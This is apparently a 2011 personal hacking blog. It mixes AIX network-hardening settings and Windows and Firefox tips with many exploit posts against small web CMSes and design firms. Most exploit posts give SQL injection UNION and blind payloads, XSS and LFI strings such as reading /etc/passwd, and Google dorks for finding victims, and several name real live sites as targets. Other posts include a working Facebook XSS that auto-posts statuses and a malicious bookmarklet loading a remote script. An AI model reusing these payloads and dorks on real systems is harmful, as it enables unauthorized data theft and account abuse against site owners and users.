Wednesday, December 21, 2011

AIX IP Stack Tuning

Having problem during AIX Server Assessment/Hardening recently. After a few googles,found this great blog
http://www.cymru.com
helps a lot in my assessment.

1. TCP send and receive spaces

The TCP send and receive spaces directly effect the TCP window size parameter. An increased window size will allow for more efficient transfers, particularly bulk transfers such as FTP and HTTP. The default for each is not optimal, and should be increased to 32768 bytes. This value should not be increased above 64K bytes unless the implications of RFC1323 and RFC2018 are fully understood and support for both is enabled.

Do not enable RFC1323 without also enabling support for RFC2018. Remember, pipe drain is a Bad Thing[tm].

A. AIX
    /usr/sbin/no -o tcp_sendspace=32768
    /usr/sbin/no -o tcp_recvspace=32768

   
2. Socket queue defense against SYN attacks

While great effort is undertaken to defend any network from those with malicious intent, several ports (largely TCP) must remain open to conduct business. Internet vandals may attempt to exploit these ports to launch a denial of service attack. One of the most popular attacks remains the SYN flood, wherein the socket queue of the attacked host is overwhelmed with bogus connection requests. To defend against such attacks, certain UNIX variants maintain separate queues for inbound socket connection requests. One queue is for half-open sockets (SYN received, SYN|ACK sent), the other queue for fully-open sockets awaiting an accept() call from the application. These two queues should be increased so that an attack of low to moderate intensity will have little to no effect on the stability or availability of the server.

A. AIX
    /usr/sbin/no -o clean_partial_conns=1
    This setting will instruct the kernel to randomly remove half-open sockets from the q0 queue to make room for new sockets.


3. Redirects

A miscreant can use IP redirects to modify the routing table on a remote host. In a well-designed network, redirects to the end stations should not be required. Both the sending and accepting of redirects should be disabled.

A. AIX
    /usr/sbin/no -o ipignoreredirects=1
    /usr/sbin/no -o ipsendredirects=0

   
4. ARP cleanup

It is possible for a miscreant to create a resource exhaustion or performance degredation by filling the IP route cache with bogus ARP entries. In Solaris, there are two parameters that govern the cleanup interval for the IP route cache. For unsolicited ARP responses, the parameter to be tuned is arp_cleanup_interval. In AIX, the cleanup interval is governed by the value of arpt_killc. However, this parameter governs both solicited and unsolicited ARP entries. For this reason, it is likely best to leave the parameter at the default setting of 20 minutes.

A. AIX
    /usr/sbin/no -o arpt_killc=20


5. Source routing

With source routing, an attacker can attempt to reach internal IP addresses - including RFC1918 addresses. It is important to disable the acceptance of source routed packets to prevent subtle probes of your internal networks.

A. AIX
    /usr/sbin/no -o ipsrcroutesend=0
    Disable the sending of source routed packets.

    /usr/sbin/no -o ipsrcrouteforward=0
    This is important if the box is routing, e.g. a firewall. Disable this feature to prevent the host from forwarding source routed packets.


6. TIME_WAIT setting

On a busy web server, many sockets may linger in the TIME_WAIT state. This is caused by improperly coded client applications that do not properly shut down a socket. This can also be used as a type of DDoS attack.

A. AIX
    No tuning recommendations.


7. Broadcast ECHO response
Smurf attacks work by sending ICMP 8 0 (ECHO REQUEST) messages to a broadcast address from a spoofed address. Some IP stacks will respond, by default, to such messages. This should be disabled. Further, if the host is a firewall (router), it should not propogate directed broadcasts.

A. AIX
    /usr/sbin/no -o directed_broadcast=0
    Do not respond to directed broadcasts
.

8. Other broadcast probes

There are two other broadcast probes that a miscreant could utilize against a network. The address mask query can be used to map out the size of the netblock, and set a range for further probes. The timestamp broadcast is another means of mapping and fingerprinting hosts.

A. AIX
    /usr/sbin/no -o icmpaddressmask=0
    Prevent address mask queries.


other references that might helps during AIX Assessment/Hardening

http://abstractinitiative.com/PerformanceJungle/2009/09/aix-security-hardening-script/
http://publib.boulder.ibm.com
http://www.boran.com/security/sp/aix_hardening.html
http://www.ncftp.com/ncftpd/doc/misc/ephemeral_ports.html
http://slashzeroconf.wordpress.com/2008/01/20/unix-password-selection-expiration/

Monday, November 14, 2011

hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection

Title      :    hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection
Vendor    :  http://www.hileytech.com
Links    :    http://www.hileytech.com/cartspec.html
Type     :    Web Application


Parameter 'proddetail.php' in hileyTECH Ecommerce Cart Pro is vulnetable to SQL Injection.
Proof of concept ::

http://localhost/proddetail.php?prod=[SQL]
http://localhost/proddetail.php?prod=-productname' union select concat(version())--+

~/p0pc0rn/~

Wednesday, November 2, 2011

Wordpress Plugin youtube-uploader Vulnerable to XSS

Title : Wordpress Plugin youtube-uploader Vulnerable to XSS
Dork  : inurl:"youtube-uploader/action.php?action="
by      : p0pc0rn


http://site.com/wp-content/plugins/youtube-uploader/action.php?action=[xss]




~/p0pc0rn/~

Saturday, October 22, 2011

Light & Shade Creative Studio web design multiple sql injections

Title : Light & Shade Creative Studio web design multiple sql injections
Found : 22 October 2011
Web   : http://www.lnsstudio.com/


[sql]
1 - articles-detail.php?aid=[sql]
2 - notice_detail.php?nid=[sql]
3 - photogallery.php?aid=[sql]
4 - alumni-details.php?batch=[sql]
5 - alumni_students.php?batch=[sql]
6 - more..

Examples :
http://www.fhss.edu.np/articles-detail.php?aid=9'
http://www.shangri-la.edu.np/notice_detail.php?nid=3'
http://www.ops.edu.np/notice_details.php?nid=17'


~/p0pc0rn/~

dreams & ideas web design multiple vulnerabilities

Title : dreams & ideas web design multiple vulnerabilities
Found : 22 October 2011
Web   : http://www.dreamsandideas.com


[sql]
1 - products.php?CatID=[sql]
2 - news_details.php?nid=[sql]
3 - success_story_details.php?sid=[sql]
4 - inside.php?id=[sql]
5 - contact.php?id=[sql]
6 - visaupdate_details.php?vid=[sql]
7 - products.php?BrandID=[sql]
8 - more..

Examples :

http://www.alfabetaedu.com/news_details.php?nid=31'
http://www.neoteric.com.np/products.php?BrandID=2'
http://www.cybersansar.com/article_list.php?pageno=1
POST frdate=2011-10-22&todate=2011-10-22&list_article=-Select-&keyword='&Submit=Submit
http://www.enasha.com/bnb_profile.php?pid=148'


[xss]

1 - search.php
2 - search_result.php?mk=

Examples :
http://www.afn.org.np/search.php
POST keyword=<iframe src=http://www.1337day.com />&search.x=0&search.y=0
http://www.enasha.com/search_result.php?mk=Toyota<iframe src=http://www.1337day.com />



~/p0pc0rn/~

Wednesday, October 12, 2011

Monday, August 22, 2011

Run the Application as Administrator Just by a Click!

How to Set Our Application to Always Running as Administrator in Windows 7
------------------------------------------------------------------------------------------------
-----

1 - Right click to the application that you want to run as administrator and choose properties.Before that make sure you already set the shortcut for the application.
As example I created a cmd.exe shortcut at Desktop.I want to run cmd.exe as administrator just by a click after this.No need to right click,blalala..wasting my time!


2 - Go to Shortcut tab and choose Advanced.
3 - Tick "Run as Administrator",and DONE!
  
Before as Administrator
After as Administrator.Just by a click!

Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection

Title : LASERnet CMS  Vulnerable to SQL Injection
Vendor : http://cms.lasernet.gr/index.php?lang=en
Dork : intext:"Powered by Lasernet"
Category: WebApps


http://localhost.com/index.php?id=[SQL]

Demo:
http://localhost.com/index.php
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+


thanks,
-p0pc0rn-


CarRentals CMS Vulnerable to SQL Injection


Title : CarRentals CMS Vulnerable to SQL Injection
Vendor : N/A
Dork : intext:"Powered by CarRentals CMS"
Category: WebApps


http://localhost.com/*.php?id=[SQL]

~/POC/~
-------

http://localhost.com/book-offer.php?offer_id=-1' /*!12345union*/ select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11--+


thanks,
-p0pc0rn-

Thursday, August 4, 2011

Cambria Web Design Vulnerable to Multiple SQL Injection


Title : Cambria Web Design Vulnerable to Multiple SQL Injection
Vendor : http://www.cambria.com
Dork : intext:"Web Design by Cambria" filetype:asp
Dork2 : intext:"Custom software and Web Design by Cambria"
Category: WebApps


http://localhost.com/product_page.asp?ProductID=[SQL]&ProductCatID=[SQL]
http://localhost.com/pagecontent.asp?page=[SQL]
http://localhost.com/product_page.asp?Search=[SQL]
http://localhost.com/articles.asp?ArticleID=[SQL]


There are more parameters need to be checked.

~//POC//~

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/product_page_detail.asp, line 78

-------------------------------------------------------------------------------------
http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1+or+1=convert(int,(@@version))

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/product_page_detail.asp, line 78
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

- p0pc0rn -

shoma.net Web Design Vulnerable to Multiple SQL Injection


Title : shoma.net Web Design Vulnerable to Multiple SQL Injection
Website : http://www.shoma.net/
Dork : Developed by Shoma.net
Type : WebApps


http://localhost.com/SubNews.cfm?NewsID=[SQL]
http://localhost.com/details.cfm?TourID=[SQL]&categoryId=[SQL]
http://localhost.com/Hotellist.cfm?starID=[SQL]
http://localhost.com/index_show.asp?idbasic=[SQL]
http://localhost.com/index_view.asp?idrecipie=[SQL]

There are more parameters need to be checked.

#####
#POC#
#####

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://127.0.0.1/Subnews.cfm?newsid=1'
Error Executing Database Query.
[Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'newsId=1'''.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++


- p0pc0rn -

Tuesday, July 26, 2011

Infotrex Solutions Web Design Vulnerable to Multiple SQL Injections


Title : Infotrex Solutions Web Design Vulnerable to Multiple SQL Injections
Vendor: http://www.infotrex.net
Dork : intext:"Web Development by Infotrex Solutions"


+++++++++++++++++++++++++++++++
Microsoft Access Injection +
+++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1 - http://www.site.com/details.asp?catid=[]&subcatid=[]&pid=[SQL] +
2 - http://www.site.com/news.asp?action=read&nID=[SQL] +
3 - http://www.site.com/product.asp?catid=[SQL] +
4 - http://www.site.com/contents.asp?id=[SQL] +
5 - http://www.site.com/details.asp?pid=[SQL] +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Thanks,
p0pc0rn

Tuesday, July 5, 2011

4shared Downloader

How to use?

1 - Make sure you have an account in 4shared.com..just a free account :)
2 - Login into your account

3 - Open command prompt and just run this python script :)

Usage : 4shared.py Url


4 - It will open the download link from your browser and just click save


Here's the script
http://pastebin.com/2eDsyjm9

Friday, July 1, 2011

Adf.ly Bypass

Hate to waiting even 5 secs?
Want to bypass the waiting time?
Its easy
As example you want to download this
http://adf.ly/1wuNc
Go to the link,and at the url bar type this
javascript:showSkip();
The countdown will be skipped and you can download directly get the real link :)

4shared Download Tricks

4shared Download Tricks
So there are two tricks you can do to download file from 4shared.com
Let say we want to download this thing.
http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.html
We can
1 - bypassing waiting time.
Go to download page.
http://www.4shared.com/get/fTg3hpDR/a_byte_of_python__persian_tran.html
and at the url type this
javascript:alert(c=0)
this will bypass the waiting time from 59secs to 0sec :)

another way is

2 - Get the download url directly
at the file page
http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.html
you just need to type this at the url bar
javascript:alert(startDownload)

the download link will popup and just copy and paste at the url to download :)

Unix Command in Windows???

Unix Command in Windows???

Yeah,there's a little secret that might you dont know about Windows 7.We can use Unix command in Windows without using cygwin! believe it?
Let's look it together.

The name of this technology? It used to be called Interix, then became Services for UNIX (SFU) as they added more bits on top of Interix, and is now known as Subsystem for UNIX-based Applications (SUA). The current name is more of a mouthful, but is a more accurate name.


So, to run SUA, you need one of the following versions of Windows:
Windows Server 2008
Windows Server 2003 R2
Windows 7 - Enterprise or Ultimate Edition
Windows Vista - Enterprise or Ultimate Edition

Other than that? Dont work :(

How to enable this SUA? [I'm using Windows 7 Ultimate in this case as example]

1 - Go to the Control Panel.
2 - Browse to Programs and Features.
3 - Click Turn Windows features on or off.
4 - Select the check box for Subsystem for UNIX-based Applications.
5 - Click OK
6 - In the start menu, click All Programs > Subsystem for UNIX-based Applications > Download Utilities for Subsystem for UNIX-based Applications
7 - Download the SUA installer from the Microsoft website. Which in my case,I download this-->Utilities and SDK for UNIX-based Applications_X86.exe. Choose which one suit your pc.
8 - Once downloaded, double-click Utilities and SDK for UNIX-based Applications_X86.exe in your downloads folder.
9 - Go trough the auto-installer.
10 - I'd recommend you choose the custom setup and enable the GNU Utilities and then, in the following step, select all three check boxes to allow su to root, enable setuid and enable case sensitivity.
11 - Finished! And now you can run UNIX commands.

Wednesday, June 15, 2011

Axel Accelarator for Windows

I google a bit and found someone that share this Axel accelarator for windows users.

Download here.
http://www.mediafire.com/?wi8dw1hbaqinhfz

extract and just use it!

usage like below
Usage: axel.exe [options] url1 [url2] [url...]

--max-speed=x -s x Specify maximum speed (bytes per second)
--num-connections=x -n x Specify maximum number of connections
--output=f -o f Specify local output file
--search[=x] -S [x] Search for mirrors and download from x servers
--header=x -H x Add header string
--user-agent=x -U x Set user agent
--no-proxy -N Just don't use any proxy server
--quiet -q Leave stdout alone
--verbose -v More status information
--alternate -a Alternate progress indicator
--help -h This information
--version -V Version information
screenshot




credit to

// ghuntley [code]https://github.com/ghuntley/cygwin-axel/[/code]
// ~n2j3 [code]http://st0rage.org/~n2j3/[/code] :drunk:

Monday, June 6, 2011

Web Wiz Site News Vulnerable to SQL Injection

#####################################################################
## Title : Web Wiz Site News Vulnerable to SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.webwiz.co.uk/ ##
## Dork : Powered by Web Wiz Site News ##
#####################################################################

- POC -
http://site.com/news/news_item.asp?NewsID=[SQL]

- Thanks -
p0pc0rn

edit: found by others already. http://www.1337day.com/exploits/15677

Friday, June 3, 2011

El Espejo Web Design Vulnerable to Multiple SQL Injection

#####################################################################
## Title : El Espejo Web Design Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.elespejodesign.com.ar/sitio/index.php ##
## Dork : !@#$%^&*()_ ##
#####################################################################

- POC -
http://site.com/sitio/something.php?id=[SQL]
http://site.com/sitio/detalle_foto.php?id=-236 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(version(),0x3a,user(),0x3a,database()),16,17,18,19--

http://site.com/sitio/detalle_edificios.php?id=-144 UNION SELECT 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--

not just parameter index.php,there are more parameters vulnerable. Check it out.

- Thanks -
p0pc0rn

Inmueblesoft CMS Vulnerable to Multiple SQL Injection


##################################################################
## Title : Inmueblesoft CMS Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: www.inmueblesoft.com ##
## Dork : intext:"Inmueblesoft" filetype:php ##
#################################################################


- POC -
http://site.com/index.php?tabla=something&id=[SQL]
http://site.com/index.php?tabla=something&id=-15 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95--



not just parameter index.php,there are more parameters vulnerable. Check it out.

- Thanks -
p0pc0rn

Monday, May 23, 2011

Acuity CMS Vulnerable to Blind SQL Injection


Title : Acuity CMS Vulnerable to Blind SQL Injection
Found by : p0pc0rn
Dork : intext:"Powered by Acuity CMS."
Web : http://www.acuitycms.com/


SQL Injection
----------------
http://www.site.com/browse.asp?page=[Blind SQL]

POC
----
http://www.site.com/browse.asp?page=255+or+1=1 TRUE
http://www.site.com/browse.asp?page=255+or+1=1 FALSE

thanks,
-p0pc0rn-

Golden IT Solutions Web Design Vulnerable to SQL Injection

Title : Golden IT Solutions Web Design Vulnerable to SQL Injection
Found by : p0pc0rn
Dork : intext:"Developed By : Golden IT Solutions"

SQL Injection
----------------
http://www.site.com/anypath.php?ID=[SQL]

POC
----
http://www.site.com/memProfile.php?ID=-2800 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--



thanks,
-p0pc0rn-

Saturday, May 21, 2011

New LFI Exploit found :)

New LFI Exploit found :)
-------------------------
By p0pc0rn May 2011
Dork: inurl:"index.php?loc=subindex"
Exploit :

site.com/index.php?loc=../../../../../../../../../../../../../../../etc/passwd





thanks
-p0pc0rn-

Wednesday, May 11, 2011

New WallSpam Using Javascript in Facebook

New WallSpam Using Javascript in Facebook
------------------------------------------

If u notice a wallpost like this,NEVER EVER CLICK IT!!
[spam]Not like Justin Biebier which always never say never.He's an idiot [/spam]

Take note the url below your browser.when you click the link,you will execute a javascript to post it on your wall.
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
http://pelorak.info/verify.js
<--bad evil code!!



I tried to click and this what appeared.


And the it'll redirect you to here

So,just like others,your profile will full with spams.
Beware more will come after this.Someone will take this as an oppurtunity to have fun.

Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PosgreSQL Injection


Title : Creatop Web Design Vulnerable to PosgreSQL Injection
Vendor: http://www.creatop.com.au/
Found : by p0pc0rn
Dork : intext:"by Creatop" filetype:cfm


PosgreSQL Injection
-------------------
http://www.victim.com/index.cfm?MenuID=[Injection]

Example:
http://www.victim.com/index.cfm?MenuID=80 and 1=cast(version() as int)
### ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" ###



.:p0pc0rn:.

Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities


Title : PakCyber Web Design Multiple Vulnerabilities
Found : by p0pc0rn
Vendor: http://pakcyber.com/
Dork : intext:"Powered By PakCyber"


Blind SQL Injection
-------------------

http://www.victim.com/site.php?article_id=[Blindey]
Eg:
http://www.victim.com/full_article_text.php?article_id=808 and 1=1 TRUE
http://www.victim.com/full_article_text.php?article_id=808 and 1=2 FALSE

http://www.victim2.com/site.php?cid=[Blindey]
Eg:
http://www.victim2.com/university.php?cid=8 or 1=1-- TRUE
http://www.victim2.com/university.php?cid=8 or 1=2-- FALSE



http://www.victim3.com/site.php?CatId=[Blindey]
Eg:
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=1-- TRUE
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=2-- FALSE

There are more parameters need to be checked out.High possibility there's a SQL Injection vulnerablity too

Cross Site Scripting
--------------------
http://www.victim.com/CategoryDetails.php?CatId=44&CatName=[XSS]

thanks,
#p0pc0rn#

Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection


Title : ezeXs Web Design Vulnerable to SQL Injection
Web : http://www.ezexs.com/
By : p0pc0rn
Dork : intext:"Powered by ezexs.com"


Microsoft Access SQL Injection
------------------------------

http://site.com/[type].asp?[id]=[SQL]

Notes : All parameters are possible to be injected.

POC
---

http://site.com/product_detail.asp?Id=57 union select 1 from test.a
http://site.com/category.asp?Id=49 union select 1 from test.a



more out there.

thanks,
-p0pc0rn-

Site Developed by Magfiroh Vulnerable to SQL Injection


Title : Site Developed by Magfiroh Vulnerable to SQL Injection
Filetype : ColdFusion
Found by : p0pc0rn
Dork : inurl:".cfm?judul="


SQL
---

http://site.com/parameter.cfm?judul=[SQL]

POC
---

http://site.com/download_detail.cfm?judul=1'

Live Demo
---------

http://www.stiabinabanua.ac.id/download_detail.cfm?judul=30 UNION SELECT 1,2,version(),user(),5,6--



thanks,
-p0pc0rn-

Tuesday, April 5, 2011

eksi7 Web Design Vulnerable to Multiple SQL Injection


Title : eksi7 Web Design Vulnerable to Multiple SQL Injection
Vendor: http://www.eksi7.com
Found by : p0pc0rn
Dork :
inurl:"devam.asp?haber_id="
inurl:"kat_list.asp?kat_id="
intext:"tasarim ve programlama eksi7 web hizmetleri"
intext:"design and programming eksi7 web services"


MSSQL
-----
http://site.com/path/haber/devam.asp?haber_id=[MSSQL]

POC
---
http://site.com/v4/haber/devam.asp?haber_id=7927+and+1=@@version


JetDatabase
-----------
http://site.com/path/haber/devam.asp?haber_id=[SQL]
http://site.com/path/icerik/kat_list.asp?kat_id=[SQL]

POC
---
http://site.com/abana/haber/devam.asp?haber_id=460 UnIoN SelECt 1 from test.a
http://site.com/rozey/icerik/kat_list.asp?kat_id=7 unIoN SelEct 1 from test.a


thanks,
-p0pc0rn-

Monday, April 4, 2011

Autonics Corporation Websites Vulnerable to Remote File Download

Title : Autonics Corporation Websites Vulnerable to Remote File Download
Found by : p0pc0rn
Dork : inurl:"download.php?bo_code=data"

POC
---
http://site.com/board/download.php?bo_code=data&filename=[remote file download]

* -------------------------------------------------------------------------
* @Creator Psyche Lee
* @version 1.0
* @date 2007-11-22
* -------------------------------------------------------------------------
* Copyright 2007 by Psyche Lee
* -------------------------------------------------------------------------
****more****

thanks,
-p0pc0rn-

Sunday, April 3, 2011

Master Password in Firefox


Master Password in Firefox
--------------------------


Some of us maybe stored password for some sites in our browser.SO..
It's really important to set your master password in firefox browser
Why we need to set the master password?
This is because, if attacker physically access to our computer as example,they can check our stored passwords at

Tools > Options > Security > Saved Password > Show Password


Dangerous meh?!

What you need to do is simple, just set the master password

Tools > Options > Security > Master Password



and then each time someone attempt to see the saved password,firefox will ask for master password first. Same happen if someone trying to browse to your favourite website where you did stored password in browser,firefox will ask to put the master password first.


Have a try.

Thanks
-p0pc0rn-

Tuesday, March 29, 2011

New XSS at m.facebook.com

So,noticed that there's a new XSS vulnerability found at facebook by someone.
Figured out after saw my friend update his facebook status in Indonesian language.


so,the what the attacker can do is when a victim click the link,the victim will automatically update his/her facebook status via..facebook own apps!!
u can see the status is updated via Share from the screenshot.

POC of XSS


so,how the attacker do to make the victim will update their status just by clicking the link??

http://m.facebook.com/path/blalallaa.php?display=wap&user_xxxx_xxxx='%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value='Update Status!!!%20http://fakelink.cc/something';document.forms[0].submit();}%3C/script%3E

p/s
- if u want to click the link without updating your facebook,logout first :D
- make the shorten url become the real url first
- still,never click.maybe some attacker can use a dangerous script for something bad attempt
- just remove the status update before your friend click it.pls dont share for fun.it can be something that dangerous for your facebook account if the attacker want to.

edited :
- facebook team already fixed this vuln.
- my friend also blogged about this. here
disclaimer : i'm not the one found this vuln at first.kudos to the real founder.

Wednesday, March 23, 2011

CAPSoft CMS Multiple Vulnerabilities


Title : CAPSoft CMS Multiple Vulnerabilities
Vendor : http://www.capsoft.com.ar
Found by : p0pc0rn


SQL
---
Vulnerable Parameters are

Method = GET
------------
http://site.com/noticia.asp?id=[SQL]
http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL]
http://site.com/product.asp?intProdID=[SQL]
http://site.com/productosporcategoria.asp?intCatalogID=[SQL]

POC
---
http://site.com/noticia.asp?id=1 union select 0 from test.a

Method = POST
-------------
buscador.asp
ingresar.asp

XSS
---
http://site.com/diseno_web.asp?pcia=[XSS]
http://site.com/productosporcategoria.asp?intCatalogID=[id_number]&strCatalog_NAME=[XSS]


thanks,
-p0pc0rn-

Inventory Mojo Software Vulnerable to Multiple SQL Injections


Title : Inventory Mojo Software Vulnerable to Multiple SQL Injections
Found by : p0pc0rn
Dork : intext:"Powered by Inventory Mojo Software."

SQL
---
Vulnerable Parameters are

Method = GET
------------
categoria.asp
producto.asp
srubro.asp
marca.asp

Method = POST
-------------
buscar.asp
Login.asp
NewUser.asp
do_addToNewsletter.asp

POC
---
http://site.com/categoria.asp?CT=6' and '1'='1 TRUE
http://site.com/categoria.asp?CT=6' and '1'='0 FALSE

thanks,
-p0pc0rn-

Sunday, March 20, 2011

Shimbi CMS Vulnerable to Multiple SQL Injections


Title : Shimbi CMS Vulnerable to Multiple SQL Injections
Vendor : http://www.shimbi.in/
Found by : p0pc0rn
Dork : intext:"Powered By Shimbi CMS"


SQL Injection in details.php parameter
---------------------------------------
http://site.com/details.php?id=[sql]

POC
---
http://site.com/details.php?id=112 UNION SELECT 1,2,3,4,version(),6,7,8


SQL Injection in faq_details.php parameter
---------------------------------------
http://site.com/faq_details.php?flag=q&id=[sql]

POC
---
http://site.com/faq_details.php?flag=q&id=1'


SQL Injection in blog/addComment.php parameter
---------------------------------------
http://site.com/blog/addComment.php?topic_id=[sql]

POC
---
http://site.com/blog/addComment.php?stat=stat&type=t&category_id=9&topic_id=-122/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--


thanks,
-p0pc0rn-